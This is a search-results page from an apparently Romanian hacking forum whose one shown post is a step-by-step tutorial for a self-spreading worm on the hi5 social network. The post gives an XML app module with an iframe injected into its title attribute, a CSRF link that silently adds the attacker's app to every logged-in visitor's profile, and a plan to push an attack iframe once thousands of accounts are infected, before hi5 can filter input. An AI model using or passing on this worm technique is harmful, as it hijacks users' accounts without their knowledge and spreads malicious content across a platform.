Jump to content

Search the Community

Showing results for tags 'hi5 xss worm'.

  • Search By Tags

    Type tags separated by commas.

  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End

Last Updated

  • Start

    End

Filter by number of...

Joined

  • Start

    End

Group

Website URL

Yahoo

Jabber

Skype

Location

Interests

Occupation

Interests

Biography

Location

Found 1 result

  1. Guest
    Cred ca asta e cel mai simplu tutorial de pe fata pamantului cand vorbim de un web worm. UPDATED SETUP Urmati pasii de aici: http://rstcenter.com/forum/18899-rst-hi5-0day-xss-permanent.rst Folosind live http headers din firefox salvati url-ul ce adauga aplicatia pe profilul vostru cand apasati butonul Add to my profile. PROPAGAREA Modificati in casuta de edit <?xml version="1.0" encoding="UTF-8"?> <Module> <ModulePrefs title="Sample App" author_email="pulea@binkmail.com" /> <Content type="html"><![CDATA[ Hello, world! ]]></Content> </Module> cu <?xml version="1.0" encoding="UTF-8"?> <Module> <ModulePrefs title="[i]<iframe src=http://tinyurl.com/codredirect>[/i]" author_email="pulea@binkmail.com" /> <Content type="html"><![CDATA[ Hello, world! ]]></Content> </Module> Unde scrie tinyurl.com adaugati linkul catre aplicatia voastra pe care l-ati aflat folosind live http headers. Linkul aplicatiei arata cam asa http://hi5.com/friend/apps/addApp.do?referrer=&privacy=1&privacy=2&privacy=3&privacy=4&privacy=5&appId=44444&appContext=1. Va trebui sa il modificati pentru ca in locul "appId=44444" sa fie id-ul aplicatiei voastre. Adaugam linkul in image tag pentru ca este un csrf penibil si executa comanda respectiva fara ca cineva sa devina suspicios. Ori de cate ori va viziteaza Gheorgita profilul (adica cineva care este logat pe contul de hi5), va adauga fara sa stie aplicatia voastra pe profilul lui. Cei care ii viziteaza profilul lui Gheorghita la randul lor isi vor adauga fara sa stie aplicatia voastra pe contul lor. Si tot asa se imprastie singura aplicatia pe conturile vizitatorilor hi5. ATACUL Dupa ce s-au infectat mii de persoane (dureaza cateva zile doar), dati din nou edit la aplicatia voastre si adaugati iframe-ul din imaginea de mai jos dupa modelul tutorialului prezentat aici => http://rstcenter.com/forum/18899-rst-hi5-0day-xss-permanent.rst. In iframe nu uitati sa puneti linkul vostru in locul celui catre epicfail.ro. Deasemeni cititi cu atentie si primul tutorial pentru a nu da rateuri la setup. E de preferat metoda din tutorialul meu fata de un atac direct cu iframe si injectarea aplicatiilor in conturile utilizatorilor, pentru ca veti afecta mii de conturi in acelasi timp fara ca cei de la hi5 sa aiba timp sa filtreze input-urile in timp rapid. Enjoy!
×
×
  • Create New...